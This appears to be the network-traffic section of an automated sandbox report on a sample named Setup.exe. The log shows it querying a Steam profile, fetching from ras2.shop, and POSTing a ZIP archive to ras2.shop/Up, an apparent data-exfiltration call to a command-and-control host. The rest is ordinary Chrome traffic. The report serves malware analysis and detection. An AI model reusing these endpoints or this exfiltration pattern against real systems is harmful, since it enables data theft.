Dec 27, 2024 21:27:44.398426056 CET  192.168.2.4  1.1.1.1  0xc7b4    Standard query (0)  www.google.com      A (IP address)  IN (0x0001)  false
Dec 27, 2024 21:27:44.398716927 CET  192.168.2.4  1.1.1.1  0x5ffa    Standard query (0)  www.google.com      65              IN (0x0001)  false
Dec 27, 2024 21:27:51.576178074 CET  192.168.2.4  1.1.1.1  0x230a    Standard query (0)  apis.google.com     A (IP address)  IN (0x0001)  false
Dec 27, 2024 21:27:51.576400042 CET  192.168.2.4  1.1.1.1  0xf860    Standard query (0)  apis.google.com     65              IN (0x0001)  false
Dec 27, 2024 21:27:52.568097115 CET  192.168.2.4  1.1.1.1  0x423d    Standard query (0)  play.google.com     A (IP address)  IN (0x0001)  false
Dec 27, 2024 21:27:52.568245888 CET  192.168.2.4  1.1.1.1  0xbeda    Standard query (0)  play.google.com     65              IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                CName              Address         Type                    Class        DNS over HTTPS
Dec 27, 2024 21:27:34.312196016 CET  1.1.1.1    192.168.2.4  0xcf57    No error (0)  steamcommunity.com  -                  104.121.10.34   A (IP address)          IN (0x0001)  false
Dec 27, 2024 21:27:36.896795034 CET  1.1.1.1    192.168.2.4  0xebe5    No error (0)  ras2.shop           -                  104.21.2.114    A (IP address)          IN (0x0001)  false
Dec 27, 2024 21:27:36.896795034 CET  1.1.1.1    192.168.2.4  0xebe5    No error (0)  ras2.shop           -                  172.67.129.32   A (IP address)          IN (0x0001)  false
Dec 27, 2024 21:27:44.535466909 CET  1.1.1.1    192.168.2.4  0x5ffa    No error (0)  www.google.com      -                  -               65                      IN (0x0001)  false
Dec 27, 2024 21:27:44.556570053 CET  1.1.1.1    192.168.2.4  0xc7b4    No error (0)  www.google.com      -                  172.217.21.36   A (IP address)          IN (0x0001)  false
Dec 27, 2024 21:27:51.713077068 CET  1.1.1.1    192.168.2.4  0x230a    No error (0)  apis.google.com     plus.l.google.com  -               CNAME (Canonical name)  IN (0x0001)  false
Dec 27, 2024 21:27:51.713077068 CET  1.1.1.1    192.168.2.4  0x230a    No error (0)  plus.l.google.com   -                  142.250.181.78  A (IP address)          IN (0x0001)  false
Dec 27, 2024 21:27:51.814459085 CET  1.1.1.1    192.168.2.4  0xf860    No error (0)  apis.google.com     plus.l.google.com  -               CNAME (Canonical name)  IN (0x0001)  false
Dec 27, 2024 21:27:52.705461025 CET  1.1.1.1    192.168.2.4  0x423d    No error (0)  play.google.com     -                  172.217.19.206  A (IP address)          IN (0x0001)  false
                                                                                                                                                                                                                                                    • steamcommunity.com
                                                                                                                                                                                                                                                    • ras2.shop
                                                                                                                                                                                                                                                    • www.google.com
                                                                                                                                                                                                                                                    • apis.google.com
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49732        104.121.10.34   443               6592  C:\Users\user\Desktop\Setup.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-27 20:27:35 UTC  257                OUT        GET /profiles/76561199680660089 HTTP/1.1
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3.1; HP Compaq 2110b Build/JLS36C) AppleWebKit/601.32 (KHTML, like Gecko) Chrome/50.0.1590.318 Mobile Safari/534.3
                                                                                                                                                                                                                                                    Host: steamcommunity.com
                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-27 20:27:36 UTC  1905               IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 20:27:36 GMT
                                                                                                                                                                                                                                                    Content-Length: 35329
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Set-Cookie: sessionid=606f8ada2fffe233e9c73c4f; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                    Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-27 20:27:36 UTC  14479              IN         Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-27 20:27:36 UTC  16384              IN         Data Ascii: eamcommunity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">
2024-12-27 20:27:36 UTC  3768               IN         Data Ascii: ofiles/76561199680660089/badges"><div class="persona_name persona_level">Level <div class="friendPlayerLevel lvl_0"><span class="friendPlayerLevelNum">0</span></div></div></a></div><div class="prof
2024-12-27 20:27:36 UTC  698                IN         Data Ascii: &nbsp; | &nbsp;<a href="https://store.steampowered.com/legal/" target="_blank">Legal</a>&nbsp;| &nbsp;<a href="http://store.steampowered.com/subscriber_agreement/" target="_blank">Steam Subscriber Agreement</a> &nb


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.4  49734        104.21.2.114    443               6592  C:\Users\user\Desktop\Setup.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-27 20:27:38 UTC  262                OUT        GET /ujs/f1575b64-8492-4e8b-b102-4d26e8c70371 HTTP/1.1
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3.1; HP Compaq 2110b Build/JLS36C) AppleWebKit/601.32 (KHTML, like Gecko) Chrome/50.0.1590.318 Mobile Safari/534.3
                                                                                                                                                                                                                                                    Host: ras2.shop
                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-27 20:27:38 UTC  787                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 20:27:38 GMT
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FqQZRoVCLRy1UsiC6b0mguQ0%2BuUjI8bH9xRph%2BLcMDGT%2F4Mo4CVTZ7EA3A%2F6N5VeqHQwdYAC%2Bmnd53hAAFC%2BpJM9ZxXJ2XbjvtNltEJQBEr3cKDWE9k13CXW7g8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8f8c0d6cedbaf799-EWR
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1612&min_rtt=1610&rtt_var=608&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=900&delivery_rate=1791411&cwnd=92&unsent_bytes=0&cid=030d68651d7b7862&ts=618&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49736 | 104.21.2.114 | 443 | 6592 | C:\Users\user\Desktop\Setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 20:27:40 UTC | 162 | OUT | POST /Up HTTP/1.1
                                                                                                                                                                                                                                                    Content-Type: application/octet-stream; boundary=----
                                                                                                                                                                                                                                                    User-Agent: MyApp/1.0
                                                                                                                                                                                                                                                    Host: ras2.shop
                                                                                                                                                                                                                                                    Content-Length: 349
                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                    2024-12-27 20:27:40 UTC337OUTData Raw: 50 4b 03 04 14 00 08 08 08 00 73 7b 9b 59 00 00 00 00 00 00 00 00 00 00 00 00 28 00 04 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 01 00 00 00 7d 8d bd 0e 02 21 1c c3 5f 85 74 66 e0 53 0e 46 e3 ea e2 e2 60 1c 38 0e 0d 89 01 03 17 bd c4 f8 ee fe 9f c0 ad fd b5 69 3f 88 08 d8 76 06 1c f3 4a 72 8e bd 16 32 09 41 71 dc 11 2e 38 96 d4 db 68 b7 95 ed e3 28 89 9d 72 5d 72 67 87 5e 5e b9 53 f5 7f 7e e5 78 20 48 a7 ad d6 ce 49 c9 d1 e8 e6 5c ea d2 de 83 49 41 03 4f 02 93 f7 d6 2a 32 1d c1 08 6f 39 06 51 a9 26 b1 49 a1 0c be 3f 50 4b 07 08 ad bc b0 53 7f 00 00 00 00 00 00 00 aa 00 00 00 00 00 00 00 50 4b 01 02 00 00 14 00 08 08 08 00 73 7b 9b 59 ad bc b0 53 7f 00 00 00 aa 00 00 00 28 00
                                                                                                                                                                                                                                                    Data Ascii: PKs{Y(f1575b64-8492-4e8b-b102-4d26e8c70371.txt}!_tfSF`8i?vJr2Aq.8h(r]rg^^S~x HI\IAO*2o9Q&I?PKSPKs{YS(
                                                                                                                                                                                                                                                    2024-12-27 20:27:40 UTC12OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: --------
2024-12-27 20:27:40 UTC | 733 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 20:27:40 GMT
                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H6W8PPvLt2SdfItnxUsITBzKVhMKUbM%2FSdNou0%2BAbMyXNbq%2BneAQrDt1UWBbKTU8e87C7SzJV4F0JJJEUjsfxs7a%2FAb4LqUnXnmIsQTEc7RANiWCEuM2eay09MA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8f8c0d7a0a010dc7-EWR
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1844&min_rtt=1842&rtt_var=696&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2818&recv_bytes=1193&delivery_rate=1567364&cwnd=211&unsent_bytes=0&cid=f3597d3742ce876c&ts=636&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49744 | 172.217.21.36 | 443 | 7068 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 20:27:46 UTC | 615 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
2024-12-27 20:27:47 UTC | 1219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 20:27:46 GMT
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                    Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-o8f_lsHvjJbjSjiXNQCRHQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/web
                                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/web"}]}
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    2024-12-27 20:27:47 UTC171INData Raw: 61 36 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 5d 2c 5b 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 65 76 65 6e 74 69 64 22 3a 2d 32 30 37 39 36 34 32 39 31 34 39 33 39 37 39 35 30 30 38 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70 65 22 3a 5b 5d 2c 22 67 6f 6f 67 6c 65 3a 76 65 72 62 61 74 69 6d 72 65 6c 65 76 61 6e 63 65 22 3a 38 35 31 7d 5d 0d
                                                                                                                                                                                                                                                    Data Ascii: a6)]}'["",[],[],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:suggesteventid":-2079642914939795008,"google:suggesttype":[],"google:verbatimrelevance":851}]
                                                                                                                                                                                                                                                    2024-12-27 20:27:47 UTC1INData Raw: 0a
                                                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                                                    2024-12-27 20:27:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49745 | 172.217.21.36 | 443 | 7068 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 20:27:46 UTC | 518 | OUT | GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
2024-12-27 20:27:47 UTC | 973 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Version: 705503573
                                                                                                                                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 20:27:47 GMT
                                                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Data Ascii: ,b),c)};_.ee\u003dfunction(a,b){return a.lastIndexOf(b,0)\u003d\u003d0};Pd\u003d_.Hd;_.Td\u003dclass{constructor(a){this.i\u003da}toString(){return this.i+\"\"}};Wd\u003d/^\\s*(?!javascript:)(?:[\\w+.-]+:|[^:/?#]*(?:[/?#]|$))/i;var je,ne,fe;_.he\u003dfunc


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49746 | 172.217.21.36 | 443 | 7068 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 20:27:46 UTC | 361 | OUT | GET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
2024-12-27 20:27:47 UTC | 933 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Version: 705503573
                                                                                                                                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 20:27:47 GMT
                                                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
2024-12-27 20:27:47 UTC | 35 | IN | Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-27 20:27:47 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49758 | 142.250.181.78 | 443 | 7068 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 20:27:53 UTC | 741 | OUT | GET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1
                                                                                                                                                                                                                                                    Host: apis.google.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
2024-12-27 20:27:54 UTC | 916 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access
                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access"
                                                                                                                                                                                                                                                    Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]}
                                                                                                                                                                                                                                                    Content-Length: 117446
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: sffe
                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                    Date: Thu, 26 Dec 2024 04:36:02 GMT
                                                                                                                                                                                                                                                    Expires: Fri, 26 Dec 2025 04:36:02 GMT
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                    Last-Modified: Mon, 02 Dec 2024 19:15:50 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Age: 143511
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Ascii: done)})};return e});var Ca=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regul
                                                                                                                                                                                                                                                    2024-12-27 20:27:54 UTC1390INData Raw: 5f 68 69 64 64 65 6e 5f 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 65 28 22 66 72 65 65 7a 65 22 29 3b 65 28 22 70 72 65 76 65 6e 74 45 78 74 65 6e 73 69 6f 6e 73 22 29 3b 65 28 22 73 65 61 6c 22 29 3b 76 61 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 46 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 79 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45
                                                                                                                                                                                                                                                    Data Ascii: _hidden_"+Math.random();e("freeze");e("preventExtensions");e("seal");var h=0,k=function(l){this.Fa=(h+=Math.random()+1).toString();if(l){l=_.ya(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw E
